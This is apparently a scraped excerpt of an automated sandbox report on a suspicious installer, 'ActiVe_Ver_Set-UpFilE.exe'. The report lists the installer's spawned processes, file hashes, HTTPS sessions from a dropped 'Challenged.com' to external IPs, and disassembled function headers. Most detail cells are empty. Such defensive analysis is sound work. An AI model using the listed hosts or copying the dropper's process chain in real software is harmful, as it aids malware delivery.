---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49740 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:45 UTC | 265 | OUT | |
2025-01-15 14:53:45 UTC | 78 | OUT | |
2025-01-15 14:53:45 UTC | 1134 | IN | |
2025-01-15 14:53:45 UTC | 235 | IN | |
2025-01-15 14:53:45 UTC | 1369 | IN | |
2025-01-15 14:53:45 UTC | 1369 | IN | |
2025-01-15 14:53:45 UTC | 1369 | IN | |
2025-01-15 14:53:45 UTC | 911 | IN | |
2025-01-15 14:53:45 UTC | 1369 | IN | |
2025-01-15 14:53:45 UTC | 1369 | IN | |
2025-01-15 14:53:45 UTC | 1369 | IN | |
2025-01-15 14:53:45 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49741 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:46 UTC | 282 | OUT | |
2025-01-15 14:53:46 UTC | 15331 | OUT | |
2025-01-15 14:53:46 UTC | 2825 | OUT | |
2025-01-15 14:53:47 UTC | 1140 | IN | |
2025-01-15 14:53:47 UTC | 20 | IN | |
2025-01-15 14:53:47 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49742 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:48 UTC | 273 | OUT | |
2025-01-15 14:53:48 UTC | 8729 | OUT | |
2025-01-15 14:53:48 UTC | 1130 | IN | |
2025-01-15 14:53:48 UTC | 20 | IN | |
2025-01-15 14:53:48 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49743 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:49 UTC | 279 | OUT | |
2025-01-15 14:53:49 UTC | 15331 | OUT | |
2025-01-15 14:53:49 UTC | 5081 | OUT | |
2025-01-15 14:53:50 UTC | 1138 | IN | |
2025-01-15 14:53:50 UTC | 20 | IN | |
2025-01-15 14:53:50 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49744 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:51 UTC | 280 | OUT | |
2025-01-15 14:53:51 UTC | 7123 | OUT | |
2025-01-15 14:53:52 UTC | 1146 | IN | |
2025-01-15 14:53:52 UTC | 20 | IN | |
2025-01-15 14:53:52 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49745 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:53 UTC | 281 | OUT | |
2025-01-15 14:53:53 UTC | 1385 | OUT | |
2025-01-15 14:53:53 UTC | 1137 | IN | |
2025-01-15 14:53:53 UTC | 20 | IN | |
2025-01-15 14:53:53 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49746 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:54 UTC | 275 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:54 UTC | 15331 | OUT | |
2025-01-15 14:53:56 UTC | 1136 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49747 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:56 UTC | 266 | OUT | |
2025-01-15 14:53:56 UTC | 113 | OUT | |
2025-01-15 14:53:56 UTC | 1135 | IN | |
2025-01-15 14:53:56 UTC | 218 | IN | |
2025-01-15 14:53:56 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49748 | 185.161.251.21 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:57 UTC | 201 | OUT | |
2025-01-15 14:53:57 UTC | 249 | IN | |
2025-01-15 14:53:57 UTC | 329 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.4 | 49749 | 104.21.15.122 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:58 UTC | 204 | OUT | |
2025-01-15 14:53:58 UTC | 807 | IN | |
2025-01-15 14:53:58 UTC | 562 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN | |
2025-01-15 14:53:58 UTC | 1369 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 09:53:10 |
Start date: | 15/01/2025 |
Path: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'087'006 bytes |
MD5 hash: | 047187C8DC466A354ACB17192DE48BDD |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 09:53:11 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 09:53:11 |
Start date: | 15/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 09:53:12 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6f0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 09:53:12 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xfe0000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 09:53:13 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6f0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 09:53:13 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xfe0000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 09:53:14 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 09:53:14 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\extrac32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa90000 |
File size: | 29'184 bytes |
MD5 hash: | 9472AAB6390E4F1431BAA912FCFF9707 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 9 |
Start time: | 09:53:14 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xfe0000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 09:53:14 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 09:53:15 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 12 |
Start time: | 09:53:15 |
Start date: | 15/01/2025 |
Path: | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x630000 |
File size: | 947'288 bytes |
MD5 hash: | 62D09F076E6E0240548C2F837536A46A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Has exited: | true |
Target ID: | 13 |
Start time: | 09:53:15 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\choice.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6e0000 |
File size: | 28'160 bytes |
MD5 hash: | FCE0E41C87DC4ABBE976998AD26C27E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 17 |
Start time: | 09:53:57 |
Start date: | 15/01/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x490000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 18 |
Start time: | 09:53:57 |
Start date: | 15/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Execution Graph
Execution Coverage: | 17.8% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.7% |
Total number of Nodes: | 1526 |
Total number of Limit Nodes: | 33 |
Graph
Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07381798 Relevance: 14.6, Strings: 11, Instructions: 831COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04474900 Relevance: .3, Instructions: 316COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04474998 Relevance: .1, Instructions: 131COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07381A54 Relevance: .1, Instructions: 120COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 044733F0 Relevance: .1, Instructions: 111COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04472A80 Relevance: .1, Instructions: 79COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04472AB0 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 044748F0 Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02BBD01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02BBD006 Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 073808A0 Relevance: 9.1, Strings: 7, Instructions: 318COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 073814E8 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07383518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07380571 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|